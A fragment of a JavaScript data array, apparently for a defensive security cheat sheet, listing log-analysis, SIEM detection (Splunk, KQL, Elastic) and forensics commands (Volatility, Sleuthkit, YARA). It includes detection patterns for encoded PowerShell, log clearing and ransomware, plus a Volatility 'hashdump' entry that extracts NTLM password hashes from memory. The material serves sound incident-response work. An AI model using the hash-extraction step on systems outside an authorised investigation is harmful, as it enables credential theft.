 {t:"Verify Windows Patch",d:"Check missing KBs",c:"Get-HotFix | Sort-Object InstalledOn -Descending"}
]},
{cat:"Log Analysis & SIEM",icn:"fa-file-lines",cmds:[
 {t:"Auth Log Fails",d:"Linux SSH brutes",c:"grep 'Failed password' /var/log/auth.log"},
 {t:"Auth Log Success",d:"Linux legitimate logins",c:"grep 'Accepted' /var/log/auth.log"},
 {t:"Apache SQLi Alert",d:"Grep URL patterns",c:"grep -iE \"union|select|insert\" /var/log/apache2/access.log"},
 {t:"Top Web IPs",d:"Identify flood sources",c:"awk '{print $1}' access.log | sort | uniq -c | sort -nr | head -10"},
 {t:"IIS 404 Scanner",d:"LogParser for dir busting",c:"LogParser.exe \"SELECT cs-uri-stem, COUNT(*) FROM u_ex*.log WHERE sc-status=404 GROUP BY cs-uri-stem\""},
 {t:"EventLog Failed Login",d:"Win Event 4625",c:"Get-WinEvent -FilterHashtable @{LogName='Security';Id=4625}"},
 {t:"EventLog Clear",d:"Hacker hiding tracks (1102)",c:"Get-WinEvent -FilterHashtable @{LogName='Security';Id=1102}"},
 {t:"PowerShell Encoded",d:"Base64 payload execution",c:"Get-WinEvent -LogName 'Windows PowerShell' | Where-Object {$_.Message -match '-enc'}"},
 {t:"Sysmon Proc Create",d:"Sysmon Event ID 1",c:"Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' | Where {$_.Id -eq 1}"},
 {t:"Sysmon Net Connect",d:"Sysmon Event ID 3",c:"Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' | Where {$_.Id -eq 3}"},
 {t:"Splunk: Brute Force",d:"Multiple fail query",c:"index=windows EventCode=4625 | stats count by user src_ip | where count > 5"},
 {t:"Splunk: Log Cleared",d:"Query 1102/104",c:"index=windows (EventCode=1102 OR EventCode=104)"},
 {t:"Splunk: PS Encoded",d:"Query for malware dropping",c:"index=windows EventCode=4104 Message=\"*-enc*\""},
 {t:"Splunk: Ransomware",d:"File mod volume spike",c:"index=sysmon EventCode=11 | stats count by TargetFilename | where count > 1000"},
 {t:"KQL: Suspicious PS",d:"Sentinel defender query",c:"DeviceProcessEvents | where FileName =~ 'powershell.exe' and ProcessCommandLine has '-enc'"},
 {t:"KQL: RDP Brute",d:"Summarize RDP remote IPs",c:"DeviceLogonEvents | where Protocol == 'RDP' | summarize count() by RemoteIP | where count_ > 50"},
 {t:"KQL: New Admin",d:"Detect local admin creation",c:"DeviceEvents | where ActionType == 'UserAccountCreated' | extend IsAdmin = extract(\"Administrators\", 0, AdditionalFields)"},
 {t:"Elastic: Outbound RDP",d:"Kibana non-internal RDP",c:"destination.port:3389 AND NOT source.ip:10.0.0.0/8"},
 {t:"Elastic: Mass Deletion",d:"Mass destruction event",c:"event.action:\"deleted\" | stats count by user.name | where count > 100"},
 {t:"Syslog Forwarding",d:"Tail main system logs",c:"tail -f /var/log/syslog"},
 {t:"Identify Sudo execution",d:"Check auth string",c:"grep 'COMMAND=' /var/log/auth.log"}
]},
{cat:"Forensics & Threat Intel",icn:"fa-microscope",cmds:[
 {t:"Volatility Image Info",d:"Check OS profile",c:"volatility -f mem.raw imageinfo"},
 {t:"Volatility Malfind",d:"Find injected PE/Code",c:"volatility -f mem.raw --profile=x64 malfind"},
 {t:"Volatility PS Scan",d:"Correlate unlinked processes",c:"volatility -f mem.raw --profile=x64 psscan"},
 {t:"Volatility NetScan",d:"Extract RAM sockets",c:"volatility -f mem.raw --profile=x64 netscan"},
 {t:"Volatility Hashdump",d:"Drop NTLM memory hashes",c:"volatility -f mem.raw --profile=x64 hashdump"},
 {t:"Volatility Cmdline",d:"See process arguments",c:"volatility -f mem.raw --profile=x64 cmdline"},
 {t:"Volatility Yarascan",d:"Cross-reference Yara rules",c:"volatility -f mem.raw --profile=x64 yarascan -y r.yar"},
 {t:"Create DD Image",d:"Clone physical disk",c:"dd if=/dev/sda of=image.dd bs=4M"},
 {t:"Calculate MD5",d:"Chain of custody",c:"md5sum image.dd"},
 {t:"Prefetch Decode",d:"Show Win10 executions",c:"PECmd.exe -f C:\\Windows\\Prefetch\\MALWARE.pf"},
 {t:"MFT Dump",d:"Dump NTFS master table",c:"MFTECmd.exe -f $MFT --csv c:\\temp\\"},
 {t:"Sleuthkit FLS",d:"Discover deleted elements",c:"fls -r -m \"/\" image.dd > bodyfile.txt"},
 {t:"Mactime Build",d:"Chronological events",c:"mactime -b bodyfile.txt -d > timeline.csv"},
 {t:"Plaso Log2Timeline",d:"Super-timeline generator",c:"log2timeline.py timeline.plaso image.dd"},
 {t:"Strings Extractor",d:"ASCII/Unicode from PE",c:"strings -a malware.exe > strings.txt"},
 {t:"Exiftool",d:"Extract hidden metadata",c:"exiftool document.pdf"},
 {t:"Yara Single Scan",d:"Evaluate rule instantly",c:"yara -r rule.yar /suspicious_folder"},
 {t:"Yara Process Scan",d:"Check RAM locally",c:"yara rule.yar $(pidof malware)"},
 {t:"Generate Yara",d:"Auto-create signature",c:"python yarGen.py -m /malware_samples"},
 {t:"Loki IOC Scanner",d:"Python IOC sweep",c:"python loki.py -p /suspicious_folder"},
 {t:"Check Alternate Streams",d:"NTFS ADS search",c:"dir /R C:\\Files\\"}
]}
];
